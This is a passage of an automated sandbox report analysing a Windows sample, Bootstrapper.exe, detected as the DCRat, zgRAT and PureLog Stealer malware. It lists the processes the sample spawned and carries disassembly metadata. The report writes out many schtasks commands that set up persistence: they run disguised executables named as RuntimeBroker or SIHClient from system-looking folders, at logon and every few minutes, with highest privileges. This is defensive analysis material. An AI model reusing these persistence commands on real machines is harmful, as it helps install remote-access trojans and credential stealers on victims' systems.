Start date:	13/11/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 7772 -s 2200
Imagebase:	0x7ff6082c0000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	22:53:01
Start date:	13/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\monitordll\bgx0Ow.bat" "
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	22:53:01
Start date:	13/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	22:53:01
Start date:	13/11/2024
Path:	C:\monitordll\componentreviewsavesSession.exe
Wow64 process (32bit):	false
Commandline:	"C:\monitordll/componentreviewsavesSession.exe"
Imagebase:	0x50000
File size:	1'691'136 bytes
MD5 hash:	BE4E61EEC8A6CAB29C1AEDDD29D869EC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000016.00000002.2137209000.0000000012401000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000016.00000000.2090696607.0000000000052000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\monitordll\componentreviewsavesSession.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\monitordll\componentreviewsavesSession.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\monitordll\componentreviewsavesSession.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\monitordll\componentreviewsavesSession.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 53%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	22:53:03
Start date:	13/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "wmnXYZRZEKw" /sc MINUTE /mo 11 /tr "'C:\Recovery\wmnXYZRZEK.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	22:53:03
Start date:	13/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "wmnXYZRZEK" /sc ONLOGON /tr "'C:\Recovery\wmnXYZRZEK.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	22:53:03
Start date:	13/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "wmnXYZRZEKw" /sc MINUTE /mo 12 /tr "'C:\Recovery\wmnXYZRZEK.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	22:53:03
Start date:	13/11/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\giumm02q\giumm02q.cmdline"
Imagebase:	0x7ff738120000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	22:53:03
Start date:	13/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	22:53:04
Start date:	13/11/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC1DD.tmp" "c:\Windows\System32\CSC7999042AC4784EED922BD982607A7FA2.TMP"
Imagebase:	0x7ff7fda00000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	22:53:04
Start date:	13/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "wmnXYZRZEKw" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\wmnXYZRZEK.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	22:53:04
Start date:	13/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "wmnXYZRZEK" /sc ONLOGON /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\wmnXYZRZEK.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	22:53:04
Start date:	13/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "wmnXYZRZEKw" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\wmnXYZRZEK.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	22:53:04
Start date:	13/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "SIHClientS" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\windowspowershell\Configuration\Schema\SIHClient.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	22:53:04
Start date:	13/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "SIHClient" /sc ONLOGON /tr "'C:\Program Files (x86)\windowspowershell\Configuration\Schema\SIHClient.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	22:53:04
Start date:	13/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "SIHClientS" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\windowspowershell\Configuration\Schema\SIHClient.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	22:53:04
Start date:	13/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\windows defender\en-GB\RuntimeBroker.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	22:53:04
Start date:	13/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files (x86)\windows defender\en-GB\RuntimeBroker.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	22:53:04
Start date:	13/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\windows defender\en-GB\RuntimeBroker.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	22:53:04
Start date:	13/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "wmnXYZRZEKw" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\WindowsHolographicDevices\SpatialStore\wmnXYZRZEK.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	22:53:04
Start date:	13/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "wmnXYZRZEK" /sc ONLOGON /tr "'C:\Users\All Users\WindowsHolographicDevices\SpatialStore\wmnXYZRZEK.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	22:53:04
Start date:	13/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "wmnXYZRZEKw" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\WindowsHolographicDevices\SpatialStore\wmnXYZRZEK.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	22:53:04
Start date:	13/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "componentreviewsavesSessionc" /sc MINUTE /mo 14 /tr "'C:\monitordll\componentreviewsavesSession.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	22:53:05
Start date:	13/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "componentreviewsavesSession" /sc ONLOGON /tr "'C:\monitordll\componentreviewsavesSession.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	22:53:05
Start date:	13/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "componentreviewsavesSessionc" /sc MINUTE /mo 6 /tr "'C:\monitordll\componentreviewsavesSession.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	22:53:05
Start date:	13/11/2024
Path:	C:\monitordll\componentreviewsavesSession.exe
Wow64 process (32bit):	false
Commandline:	C:\monitordll\componentreviewsavesSession.exe
Imagebase:	0x630000
File size:	1'691'136 bytes
MD5 hash:	BE4E61EEC8A6CAB29C1AEDDD29D869EC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	22:53:05
Start date:	13/11/2024
Path:	C:\monitordll\componentreviewsavesSession.exe
Wow64 process (32bit):	false
Commandline:	C:\monitordll\componentreviewsavesSession.exe
Imagebase:	0xab0000
File size:	1'691'136 bytes
MD5 hash:	BE4E61EEC8A6CAB29C1AEDDD29D869EC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	22:53:05
Start date:	13/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\R1OpfLIrNP.bat"
Imagebase:	0x7ff6c9280000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	22:53:05
Start date:	13/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	22:53:05
Start date:	13/11/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff72bec0000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	48.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	20
Total number of Limit Nodes:	0

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00401000 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 145
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNELBASE(6A4ABC5B,EC0E4EA4,?), ref: 004010E3
LoadLibraryW.KERNELBASE(6A4ABC5B,EC0E4EA4,?), ref: 004011CF
ExitProcess.KERNEL32(6A4ABC5B,73E2D87E,00000000,00000001,004C97CB,001EB6B5,Bootstrapper.exe,00000006,00000001,00000002,004017CB,000C8000,Bootstrapper.exe,00000000,00000001), ref: 00401232

Strings

Bootstrapper.exe, xrefs: 0040120B
Bootstrapper.exe, xrefs: 004011E3

Memory Dump Source

Source File: 00000000.00000002.1824505943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1824191275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1825714140.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1825738493.0000000000811000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KKjubdmzCR.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ExitProcess
String ID: Bootstrapper.exe$Bootstrapper.exe
API String ID: 2044099736-1069709054
Opcode ID: f2c6dc61e8163b631063766c463b3406f64d326b3b17b0f4ae872cd8ad238ee6
Instruction ID: fea3694f06fc1274313290b1ec8ba58a343ba0dd28ec969d8106c6876e99a987
Opcode Fuzzy Hash: f2c6dc61e8163b631063766c463b3406f64d326b3b17b0f4ae872cd8ad238ee6
Instruction Fuzzy Hash: 74511D202702099EC710AFF1D819EC577B0EF14324B4AD0A9DD486F272E77E9605D36E

Function 0040132A Relevance: 7.8, APIs: 5, Instructions: 294
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(6A4ABC5B,C2FFB03B,?), ref: 00401656
CreateFileW.KERNELBASE(6A4ABC5B,7C0017BB,?,40000000,00000000,00000000,00000002,?,00000000), ref: 0040167E
WriteFile.KERNELBASE(6A4ABC5B,E80A791F,?,?,?,?,00000000), ref: 004016A9
CloseHandle.KERNELBASE(6A4ABC5B,0FFD97FB,?), ref: 004016CB
ShellExecuteW.SHELL32(40F1A814,1BE1BB74,00000000,?,?,00000000,00000000,00000005), ref: 0040177B

Memory Dump Source

Source File: 00000000.00000002.1824505943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1824191275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1825714140.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1825738493.0000000000811000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KKjubdmzCR.jbxd

Yara matches

Similarity

API ID: File$CloseCreateDeleteExecuteHandleShellWrite
String ID:
API String ID: 292769785-0
Opcode ID: 26774f38c71d9caa2273e755db78ce882d6a355b448ad9425de0b5ee4ac364f7
Instruction ID: 045d5128fa9b6a69f2ac5f0d4266ed3001af5a14a4897ee6c4a14862fa85c519
Opcode Fuzzy Hash: 26774f38c71d9caa2273e755db78ce882d6a355b448ad9425de0b5ee4ac364f7
Instruction Fuzzy Hash: 41A14470140209BEDB319BE5CC49FAA76A8EF05354F15807BF608BA1F1D67D9A44CB2A

Analysis Process: Bootstrapper.exePID: 7428, Parent PID: 7384COMMON

Executed Functions

Function 00007FFD9B6298F8 Relevance: 1.1, Instructions: 1142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1907145575.00007FFD9B610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b610000_Bootstrapper.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80ada7eb5c4ca01150286a91a4832ba0c4c161a8dc09e18d164bda44bcd603e0
Instruction ID: 0479bb03209c2db6dc2888af4248ca19e212a467fde72316aba89fdaeaa3b052
Opcode Fuzzy Hash: 80ada7eb5c4ca01150286a91a4832ba0c4c161a8dc09e18d164bda44bcd603e0
Instruction Fuzzy Hash: 1082B330B09A4D8FEB98EF18C865AA937E1FFA9344F1501B9E45DC72A2DE24F941C741

Function 00007FFD9B622540 Relevance: .6, Instructions: 622COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1907145575.00007FFD9B610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b610000_Bootstrapper.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 539d1add7b1ca9e4c449a52f5a26a66f1bfcd0076ce23386bf6585da1e87791d
Instruction ID: bbea714a1d188ffc08399b2c4d79dca7139802a539cba6a6b152ebfe9a9ebb3d
Opcode Fuzzy Hash: 539d1add7b1ca9e4c449a52f5a26a66f1bfcd0076ce23386bf6585da1e87791d
Instruction Fuzzy Hash: 35221A3061DB898FE369DF6880546A1BBE1FFA5300F0586BED499C72A2DE34F945C781

Function 00007FFD9B61A7DA Relevance: 3.1, Strings: 2, Instructions: 599COMMON

Download Yara Rule

Strings

vY_H, xrefs: 00007FFD9B61AE4F
yY_H, xrefs: 00007FFD9B61AACF

Memory Dump Source

Source File: 00000001.00000002.1907145575.00007FFD9B610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b610000_Bootstrapper.jbxd

Similarity

API ID:
String ID: vY_H$yY_H
API String ID: 0-493923479
Opcode ID: 9209debdbc4c72ac35a023492b9a6ab78031475547cc5fe75522b80a432299a9
Instruction ID: db0e20e92a5a7508987bd24866fc0ad1377b415c1f8c9cbc0cc2c210874662a4
Opcode Fuzzy Hash: 9209debdbc4c72ac35a023492b9a6ab78031475547cc5fe75522b80a432299a9
Instruction Fuzzy Hash: D0127271E1995D4FEBA4DB58D8A97A873E1EF58350F0001F6D02DD72A6DE347E828B40

Function 00007FFD9B6279D0 Relevance: 2.1, Strings: 1, Instructions: 802COMMON

Download Yara Rule

Strings

\, xrefs: 00007FFD9B627CC5

Memory Dump Source

Source File: 00000001.00000002.1907145575.00007FFD9B610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b610000_Bootstrapper.jbxd

Similarity

API ID:
String ID: \
API String ID: 0-2967466578
Opcode ID: cfeb40a487573fd42da160dd2cb3bef7f12cc07e390e4b13dc82335ea6fdf2bc
Instruction ID: 10e56362894410a0ddd4a5d4a13622472c98f1fd8e24842609b5dd5c7bdbb866
Opcode Fuzzy Hash: cfeb40a487573fd42da160dd2cb3bef7f12cc07e390e4b13dc82335ea6fdf2bc
Instruction Fuzzy Hash: 8B423431B0EA4A4FF7289B68886567577D1EF95300F1540BED4AECB2E3DD28BD428781

Function 00007FFD9B610875 Relevance: 1.7, Strings: 1, Instructions: 473COMMON

Download Yara Rule

Strings

#CO_^, xrefs: 00007FFD9B610C19, 00007FFD9B610CAD, 00007FFD9B610CF5, 00007FFD9B610E99

Memory Dump Source

Source File: 00000001.00000002.1907145575.00007FFD9B610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b610000_Bootstrapper.jbxd

Similarity

API ID:
String ID: #CO_^
API String ID: 0-2320335572
Opcode ID: 4a49c5231b5f787b4434bd3ff3a63c22eea78b4a7a6bd4bcdd9a252288a4652f
Instruction ID: 65e284875f3dc10b81a30a452cb3c3d49186b186a47b0bf481689097086dfd71
Opcode Fuzzy Hash: 4a49c5231b5f787b4434bd3ff3a63c22eea78b4a7a6bd4bcdd9a252288a4652f
Instruction Fuzzy Hash: 1FF18E30B0D64D8FEB99EB78C4617A877A2EF95304F6100BAD41DCB2E6CE296D81C750

Function 00007FFD9B61B09A Relevance: 1.7, Strings: 1, Instructions: 424COMMON

Download Yara Rule

Strings

d, xrefs: 00007FFD9B61B42E

Memory Dump Source

Source File: 00000001.00000002.1907145575.00007FFD9B610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b610000_Bootstrapper.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: bddf6edb77e5b29d55ff7ad119f5a21597c76e22d0282d06901fb08092ce5025
Instruction ID: 0a355a1fc3960c6ec5cd2ba282a92f94747e9ea6c8917f9e1ff44796ec59562e
Opcode Fuzzy Hash: bddf6edb77e5b29d55ff7ad119f5a21597c76e22d0282d06901fb08092ce5025
Instruction Fuzzy Hash: 56C15430B1DB494FE769DB1884A563577E1FF95300B1945BED0AACB2A6DE38F8038781

Function 00007FFD9B6109FF Relevance: 1.7, Strings: 1, Instructions: 419COMMON

Download Yara Rule

Strings

#CO_^, xrefs: 00007FFD9B610C19, 00007FFD9B610CAD, 00007FFD9B610CF5, 00007FFD9B610E99

Memory Dump Source

Source File: 00000001.00000002.1907145575.00007FFD9B610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b610000_Bootstrapper.jbxd

Similarity

API ID:
String ID: #CO_^
API String ID: 0-2320335572
Opcode ID: dd14fde5bfb5631ecd45f5f4d0ffef82411611d7bc7d399d7f9e31e37f455e28
Instruction ID: 821a54e9053324bfa2a293e2a74f70969d0212c8d072c739ca953041e47a5693
Opcode Fuzzy Hash: dd14fde5bfb5631ecd45f5f4d0ffef82411611d7bc7d399d7f9e31e37f455e28
Instruction Fuzzy Hash: 2CE18D30B0964D8FEB99EB78C4657A877A1EF55304F6100BAD01DCB2E6CE39A981CB51

Function 00007FFD9B6193B0 Relevance: 1.6, Strings: 1, Instructions: 390COMMON

Download Yara Rule

Strings

d, xrefs: 00007FFD9B61B42E

Memory Dump Source

Source File: 00000001.00000002.1907145575.00007FFD9B610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b610000_Bootstrapper.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 3f3e4d39d4c3084a008bfd21c9c6367419f04dbfb9c810d27009e65abee4da37
Instruction ID: a5f161314fb272e7dcb72d6f28b4fd4c561a7f624a34b663f9c3e14d78aa4f5a
Opcode Fuzzy Hash: 3f3e4d39d4c3084a008bfd21c9c6367419f04dbfb9c810d27009e65abee4da37
Instruction Fuzzy Hash: BEC10130B1DB498FD728DB18D491635B3E1FF99300B18857DD4AAC76A6DA35F8438B81

Function 00007FFD9B629860 Relevance: 1.6, Strings: 1, Instructions: 378COMMON

Download Yara Rule

Strings

d, xrefs: 00007FFD9B62B6EE

Memory Dump Source

Source File: 00000001.00000002.1907145575.00007FFD9B610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b610000_Bootstrapper.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 1e8698038cc17a8640aaef1b0d70faac5c7d43d4de8c4c0edd77d1fa6f7d0db0
Instruction ID: 084c437be881b9f706cebd4021966025767fecf14cf8bb327b0e34847c3be598
Opcode Fuzzy Hash: 1e8698038cc17a8640aaef1b0d70faac5c7d43d4de8c4c0edd77d1fa6f7d0db0
Instruction Fuzzy Hash: 9CB1D130A1DB098FE728DB18D491636B3E1FFD5300B19497DD49ACB6A6DA35F8438781

Function 00007FFD9B614558 Relevance: 1.6, Strings: 1, Instructions: 378COMMON

Download Yara Rule

Strings

?M_H, xrefs: 00007FFD9B62E56E

Memory Dump Source

Source File: 00000001.00000002.1907145575.00007FFD9B610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b610000_Bootstrapper.jbxd

Similarity

API ID:
String ID: ?M_H
API String ID: 0-3026886977
Opcode ID: 3483b76935c666128a31081f3a798174a63544a4abdde413f131303e7ca02a72
Instruction ID: 698882eddb8b27fc82c59af052ee63b0134cb81bd8969a29a608942774d92d19
Opcode Fuzzy Hash: 3483b76935c666128a31081f3a798174a63544a4abdde413f131303e7ca02a72
Instruction Fuzzy Hash: 76B13A31B0EA890FF7659B6888656717BE1EF96310B0901FBD499CF1A3DD19BD46C380

Function 00007FFD9B61D174 Relevance: 1.5, Strings: 1, Instructions: 231COMMON

Download Yara Rule

Strings

rN_^, xrefs: 00007FFD9B61D201

